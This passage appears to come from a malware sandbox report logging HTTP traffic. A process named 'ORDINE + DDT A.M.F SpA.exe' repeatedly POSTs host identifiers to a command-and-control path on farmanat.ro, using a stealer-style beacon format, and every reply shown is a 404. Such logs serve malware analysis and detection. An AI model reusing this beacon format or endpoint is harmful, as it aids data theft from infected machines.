Nov 25, 2021 10:48:43.645826101 CET	6402	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:43.679338932 CET	6402	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:43.728280067 CET	6402	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
670	192.168.11.20	50515	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:48.491252899 CET	7244	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:48.524857998 CET	7245	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:48.585122108 CET	7245	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
671	192.168.11.20	50516	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:49.005088091 CET	7246	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:49.039268970 CET	7246	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:49.098375082 CET	7246	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
672	192.168.11.20	50517	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:49.515577078 CET	7247	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:49.549032927 CET	7247	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:49.603653908 CET	7248	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
673	192.168.11.20	50518	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:49.999556065 CET	7248	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:50.033163071 CET	7249	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:50.088978052 CET	7249	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
674	192.168.11.20	50519	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:50.513339996 CET	7250	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:50.547584057 CET	7250	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:50.604764938 CET	7250	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
675	192.168.11.20	50520	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:51.030415058 CET	7251	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:51.064649105 CET	7251	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:51.115988970 CET	7252	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
676	192.168.11.20	50521	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:51.529675961 CET	7252	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:51.563894033 CET	7253	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:51.617057085 CET	7253	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:50 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
677	192.168.11.20	50522	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:52.024612904 CET	7254	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:52.058469057 CET	7254	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:52.111958027 CET	7254	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
678	192.168.11.20	50523	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:52.530323982 CET	7255	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:52.564259052 CET	7255	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:52.614278078 CET	7256	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:51 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
679	192.168.11.20	50524	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:52.948309898 CET	7256	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:52.982491970 CET	7257	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:53.032924891 CET	7257	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.11.20	49904	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:44.201690912 CET	6403	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:44.235889912 CET	6403	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:44.288614988 CET	6403	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
680	192.168.11.20	50525	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:53.452600002 CET	7258	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:53.486818075 CET	7258	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:53.537748098 CET	7258	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:52 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
681	192.168.11.20	50526	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:53.973665953 CET	7259	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:54.007888079 CET	7259	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:54.059832096 CET	7260	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
682	192.168.11.20	50527	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:54.486840010 CET	7260	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:54.520416975 CET	7261	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:54.569268942 CET	7261	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
683	192.168.11.20	50528	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:54.975392103 CET	7262	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:55.009502888 CET	7262	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:55.059514046 CET	7262	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
684	192.168.11.20	50529	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:55.408843994 CET	7263	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:55.443159103 CET	7264	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:55.499511957 CET	7264	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
685	192.168.11.20	50530	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:55.934689045 CET	7265	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:55.968638897 CET	7265	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:56.019726038 CET	7265	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
686	192.168.11.20	50531	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:56.441220045 CET	7266	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:56.475426912 CET	7266	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:56.527676105 CET	7267	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
687	192.168.11.20	50532	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:56.962356091 CET	7267	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:56.996151924 CET	7268	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:57.046289921 CET	7268	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
688	192.168.11.20	50533	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:57.518579960 CET	7269	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:57.551886082 CET	7269	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
